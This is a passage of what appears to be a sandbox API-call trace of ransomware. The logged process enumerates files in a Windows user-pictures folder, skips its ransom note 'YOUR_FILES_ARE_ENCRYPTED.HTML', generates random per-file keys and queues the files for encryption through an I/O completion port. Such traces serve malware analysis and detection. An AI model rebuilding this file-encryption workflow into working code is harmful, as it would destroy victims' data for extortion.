(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.264] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=5400) returned 1 [0107.264] GetProcessHeap () returned 0x600000 [0107.264] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0107.267] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="01") returned 2 [0107.267] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="1D") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="5B") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="71") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="CE") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="83") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="0F") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="11") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="A0") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="20") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="75") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="2F") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="BB") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="93") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="99") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="7D") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="D6") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="B4") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="3F") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="9F") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="EE") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="DC") returned 2 [0107.267] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="84") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="2F") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="34") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="01") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="7A") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="61") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="22") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="49") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="72") returned 2 [0107.268] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="19") returned 2 [0107.268] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.png" [0107.268] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.268] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.268] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d47fe2c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="RDhJ0CNFevzX.dat", cAlternateFileName="RDHJ0C~1.DAT")) returned 1 [0107.268] StrStrIW (lpFirst="RDhJ0CNFevzX.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.268] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat") returned 67 [0107.268] PathFindExtensionW (pszPath="RDhJ0CNFevzX.dat") returned=".dat" [0107.268] lstrlenW (lpString=".dat") returned 4 [0107.268] PathFindExtensionW (pszPath="RDhJ0CNFevzX.dat") returned=".dat" [0107.268] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\rdhj0cnfevzx.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.269] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=0) returned 1 [0107.269] CloseHandle (hObject=0x31c) returned 1 [0107.269] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x967, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="user-192.png", cAlternateFileName="")) returned 1 [0107.269] StrStrIW (lpFirst="user-192.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.269] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png") returned 63 [0107.269] PathFindExtensionW (pszPath="user-192.png") returned=".png" [0107.269] lstrlenW (lpString=".png") returned 4 [0107.269] PathFindExtensionW (pszPath="user-192.png") returned=".png" [0107.269] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.269] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=2407) returned 1 [0107.270] GetProcessHeap () returned 0x600000 [0107.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0107.272] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="6C") returned 2 [0107.272] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="1F") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="84") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="D1") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="31") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="BF") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="31") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="DA") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="EE") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="64") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="09") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="A8") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="02") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="7E") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="AB") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="66") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="DB") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="E6") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="35") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="E9") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="A4") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="01") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="EE") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="46") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="DF") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B6") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="0F") returned 2 [0107.272] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B9") returned 2 [0107.273] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A5") returned 2 [0107.273] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="74") returned 2 [0107.273] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="E4") returned 2 [0107.273] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="25") returned 2 [0107.273] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png" [0107.273] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.273] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0107.273] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19f, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="user-32.png", cAlternateFileName="")) returned 1 [0107.273] StrStrIW (lpFirst="user-32.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.273] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png") returned 62 [0107.273] PathFindExtensionW (pszPath="user-32.png") returned=".png" [0107.274] lstrlenW (lpString=".png") returned 4 [0107.274] PathFindExtensionW (pszPath="user-32.png") returned=".png" [0107.274] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.274] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-32.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.274] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=415) returned 1 [0107.274] CloseHandle (hObject=0x32c) returned 1 [0107.274] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b1, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="user-40.png", cAlternateFileName="")) returned 1 [0107.275] StrStrIW (lpFirst="user-40.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.275] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png") returned 62 [0107.275] PathFindExtensionW (pszPath="user-40.png") returned=".png" [0107.275] lstrlenW (lpString=".png") returned 4 [0107.275] PathFindExtensionW (pszPath="user-40.png") returned=".png" [0107.275] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.275] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-40.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.275] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=433) returned 1 [0107.275] CloseHandle (hObject=0x32c) returned 1 [0107.275] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="user-48.png", cAlternateFileName="")) returned 1 [0107.275] StrStrIW (lpFirst="user-48.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.275] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png") returned 62 [0107.275] PathFindExtensionW (pszPath="user-48.png") returned=".png" [0107.275] lstrlenW (lpString=".png") returned 4 [0107.275] PathFindExtensionW (pszPath="user-48.png") returned=".png" [0107.275] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.275] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-48.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.276] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=501) returned 1 [0107.276] CloseHandle (hObject=0x32c) returned 1 [0107.276] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x93038, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0107.276] StrStrIW (lpFirst="user.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.276] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0107.276] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0107.276] lstrlenW (lpString=".bmp") returned 4 [0107.276] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0107.276] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.276] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=602168) returned 1 [0107.276] GetProcessHeap () returned 0x600000 [0107.276] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x682358 [0107.279] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="08") returned 2 [0107.279] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="51") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="0F") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="73") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="14") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="C2") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="C9") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="23") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="A1") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="83") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="D0") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="99") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="E2") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="1D") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="05") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="C5") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="C3") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="28") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="24") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="08") returned 2 [0107.279] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="8A") returned 2 [0107.280] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="ED") returned 2 [0107.280] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="51") returned 2 [0107.280] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="EC") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="D5") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="95") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="60") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="BA") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="76") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="C3") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="2A") returned 2 [0107.291] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="76") returned 2 [0107.292] lstrcpyW (in: lpString1=0x69240c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" [0107.292] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x682358, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.292] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x682358, lpOverlapped=0x682358) returned 1 [0107.292] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="user.png", cAlternateFileName="")) returned 1 [0107.292] StrStrIW (lpFirst="user.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.292] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.png") returned 59 [0107.293] PathFindExtensionW (pszPath="user.png") returned=".png" [0107.293] lstrlenW (lpString=".png") returned 4 [0107.293] PathFindExtensionW (pszPath="user.png") returned=".png" [0107.293] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.293] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.316] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=5400) returned 1 [0107.316] GetProcessHeap () returned 0x600000 [0107.316] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0107.319] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="57") returned 2 [0107.319] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="04") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="C4") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="FB") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="9A") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="0A") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="85") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="63") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="13") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="2C") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="56") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="98") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="8D") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="69") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="AA") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="33") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="F7") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="5C") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="7E") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="79") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="C3") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="B3") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="B1") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="2E") returned 2 [0107.319] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="E1") returned 2 [0107.320] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="81") returned 2 [0107.320] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="5A") returned 2 [0107.320] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="C0") returned 2 [0107.320] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="22") returned 2 [0107.320] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="25") returned 2 [0107.320] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="8C") returned 2 [0107.320] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="69") returned 2 [0107.320] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.png" [0107.320] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.320] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0107.321] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="user.png", cAlternateFileName="")) returned 0 [0107.321] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 